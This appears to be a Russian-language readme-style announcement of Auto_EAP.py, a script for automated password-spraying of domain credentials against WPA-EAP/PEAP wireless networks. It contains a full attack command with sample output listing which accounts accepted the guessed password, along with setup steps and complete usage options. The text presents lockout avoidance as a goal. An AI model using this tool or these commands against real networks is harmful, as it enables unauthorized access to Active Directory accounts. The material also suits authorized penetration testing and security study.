
Автоматизированные атаки методом перебора учётных данных на сети EAP.
######Опубликовано 15 сентября 2016 г.
Auto_EAP.py - это скрипт, предназначенный для автоматических атак методом грубой силы на различные типы EAP-сетей. Эти типы беспроводных сетей предоставляют интерфейс для упрощения подбора паролей доменных учетных данных, поскольку радиус-серверы проверяют аутентификацию через Active Directory. Используя библиотеку Python wpaspy, созданную [Jouni Malinen [email protected]] (https://github.com/jmalinen/hostap/tree/master/wpaspy) для взаимодействия с демоном wpa_supplicant, можно выполнять автоматические атаки аутентификации с целью избежать блокировки учетных записей.
./Auto_EAP.py -s HoneyPot -K WPA-EAP -E PEAP -U test.txt -p Summer2016 -i wlan0
Initialized...
Trying Username Alice with Password test: SUCCESS
Trying Username Bob with Password test: FAILED
Trying Username Charles with Password test: FAILED
Trying Username David with Password test: SUCCESS
Completed
Запустите 'RunMeFirst.py' в корневом каталоге Auto_EAP. Это скомпилирует библиотеку wpaspy, а также настроит отдельный файл wpa_supplicant.conf, который Auto_EAP.py будет использовать для тестирования, оставив системный конфигурационный файл wpa_supplicant нетронутым.
./Auto_EAP.py -h
usage: Auto_EAP.py [-h] -i Interface -s SSID -U Usernamefile -p Password -K
Key_mgmt -E Eap_type
optional arguments:
-h, --help show this help message and exit
-i Interface, --interface Interface
The Interface to use
-s SSID, --ssid SSID The SSID to attack
-U Usernamefile, --User Usernamefile
Path to username file
-p Password, --password Password
Password to use
-K Key_mgmt, --key_mgmt Key_mgmt
Key_Management type to use
-E Eap_type, --eap_type Eap_type
Eap type to use